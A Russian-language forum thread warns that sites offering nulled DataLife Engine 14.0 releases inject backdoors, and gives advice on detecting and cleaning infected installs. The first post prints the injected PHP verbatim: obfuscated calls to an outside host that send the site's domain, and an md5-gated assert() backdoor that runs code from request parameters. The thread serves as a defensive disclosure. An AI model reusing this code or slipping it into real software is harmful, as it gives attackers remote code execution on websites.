Информация Сайты, которые распространяют релизы DLE с левым вшитым кодом

[killoff]

Недавно проверял одну сборку, в результате вместо чистого ДЛЕ там была версия со вшитым левым кодом в файлы ДЛЕ. И сразу же решил проверить из выдачи сайты, которые выкладывают такой левый оригинал ДЛЕ.

​

Далее приведены файлы и код, который они внедряют на примере версии ДЛЕ 14.0.

Добавляют файл engine\classes\min\lib\JSMinify.php с содержимым:

Для просмотра скрытого содержимого вы должны войти или зарегистрироваться.

Проверил ДЛЕ от 13 версии выше - данного файла никогда нет и не было в оригинальных релизах DLE.
Так же этот файл прописан в доверенных в файле engine\classes\antivirus.class.php строкой:

"./engine/classes/min/lib/JSMinify.php",

[*]в файле engine\inc\addnews.php добавлен код:

    $serv = $_SERVER[HTTP_HOST];if (($serv != 'localhost') and ($serv != '127.0.0.1') and (strpos($serv, '.') != false))
    {$serv_time = "ht"."tp:/"."/xo"."rx."."net/"."js.p"."hp?lice"."nse="."14."."0_".$serv;};

$fi = 'fi'.'le';$up_times = trim(@implode ('', @$fi($serv_time)));

[*]В файле engine\modules\calendar.php добевлено:

$reg_data = $_REQUEST['captchas'];$reg_base = $_REQUEST['recaptchas'];

$recaptcha_get_signup_id  = 'eb516e7d7a6462a6d531ec65dcf1d599';

 $setel = 'a'.'sse'.'rt';if(md5($reg_data)==$recaptcha_get_signup_id) {@$setel(stripslashes($reg_base));}

[*]В engine\modules\feedback.php добавлено:

$syskey=strrev('edoce'); $pubkeys=strrev('d_46esab'); $captchacrypt=$pubkeys.$syskey;

            $sert = $_SERVER[HTTP_HOST];if (($sert != 'localhost') and ($sert != '127.0.0.1') and (strpos($sert, '.') != false))
            {$capt = 'f'.'ile';@$capt($captchacrypt('aHR0cDovL3hvcngubmV0L2pzLnBocD9saWNlbnNlPTE0LjBf').$sert);}

Возможно в других версиях DLE они правили помимо данных файлов и ещё какие-то... Но проверки одной версии хватает вполне, чтобы понять, что данный сайт распространяет заразу в своих релизах, при этом в наглую п*3*ят:

​

и все верят на слово, а потом жалуются что их сайт проседает в выдаче яндекса из-за обмана мобильных пользователей.

В общем обращение ко всем: не доверяйте левым сайтам, на форумах нуллед и зерокул я всегда выкладываю чистые версии (правда только через две недели после релиза финала), но актуальные хэш-суммы файлов выкладываю по мере возможности, чтобы если на каком то из сайтов выкладывают новую версию - любой пользователь мог сравнить файлы по хэш-сумме и понять, оригинал ли там выложен или нет, и на основе этого делать вывод - использовать скачанный релиз или ждать 100% оригинала DLE.

Решил пройтись по топ-20 выдачи яндекса по запросу "скачать DLE" и составить список всех сайтов, распространяющих "грязные" чистые оригиналы DLE. Проверять буду по последней актуальной версии DLE 14.0. Попозже укажу полный список из топ-20 выдачи.

Список сайтов, распространяющие грязные DLE:
newtemplates.ru
dlepavilion.com
dle-news.net
teroni.ru
vipadmin. club
На prowebber.ru выложен только нулл ДЛЕ и грязи никакой не обнаружено внутри архива, а так же версия без обновлений ДЛЕ, т.е. не последний релиз версии 14.0. На остальных сайтах либо нет новых релизов ДЛЕ, либо платный доступ, а версии раньше 14.0 я не проверял, т.к. нет смысла проверять сайты, на которых выложена, к примеру, последняя версия 12.0.

 

[killoff]

А какие сборки кроме Nulled есть? я не встречал других.

все версии ДЛЕ с 13 и выше - идут полностью в раскодированном виде. Все файлы в данном разделе релизов есть, нуллед, как и использование со сторонних не проверенных сайтов - используйте на свой страх и риск: Для просмотра ссылки Войди или Зарегистрируйся - на всех сайтах проверенных - везде был вшит левый код! Я всегда оригиналы публикую на нескольких сайтах/форумах!

 

[SEO.Promouter]

А есть ли с крипт, который может проверять файлы движка на наличие левых внедрений?

А то поставишь нормальный, а в будущем сайт могут взломать через украденный пароль и т.п. или клиентский сайт с кучей левых людей с доступом, и было бы уместно проверить движок на наличие как левых внедрений так и внедрений с дополнительным программированием новых возможностей.

 

[killoff]

В админке на главной странице есть пункт АНТИВИРУС - он делает снимок всех файлов на текущий момент, и потом если что то будет изменено - проверка антивирусом покажет какие файлы были изменены. Так же нужно для системы плагинов поставить режим "только для чтения", чтобы через плагины так же не могли внедрить новый код. Ну и проверка файлов сайта с оригиналом - программа Araxis Merge.

Ну и вообще если кто-то может что то сделать на сайте - лучше так же сменить права CHMOD на все файлы для запрета изменений, на файлы - 444 обычно.

 

[Den35565]

Не кто не знает на dleshka чистые релизы? А то комментарий там оставил спросил, и не пропустил админ, так как на модерации.

 

[ddeel]

всем привет, может кто знает где шаблоны фришные брать, без бекдоров и тому подобной гадости?

*** Скрытый текст не может быть процитирован. ***

у меня же вроде как куплено повышение прав, но не могу перейти, почему не понимаю, не хватает одной реакции только

 

[yura]

всем привет, может кто знает где шаблоны фришные брать, без бекдоров и тому подобной гадости?

чтоб 100%, то самому... благо вообще не сложно ж

 

[carl2024]

Я использовал эти вредоносные версии, нужно ли мне переустанавливать их, если я заменю их на чистые версии?

 

[killoff]

Я использовал эти вредоносные версии, нужно ли мне переустанавливать их, если я заменю их на чистые версии?

Лучше поставить чистую версию и накатить БД, т.к. в картинках может быть вирус, и в папках самого ДЛЕ могли быть созданы новые папки.
Можно ещё проверить сравнением установленной версии на сайте с оригиналом той же версии DLE.